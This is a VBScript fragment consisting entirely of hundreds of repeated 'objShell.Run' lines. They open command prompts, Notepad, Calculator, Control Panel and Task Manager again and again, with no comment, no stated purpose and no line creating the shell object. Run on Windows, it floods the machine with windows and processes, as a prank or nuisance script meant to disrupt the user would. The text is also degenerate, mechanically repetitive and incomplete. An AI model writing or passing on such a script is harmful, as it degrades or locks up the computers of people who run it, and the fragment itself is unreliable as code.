objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
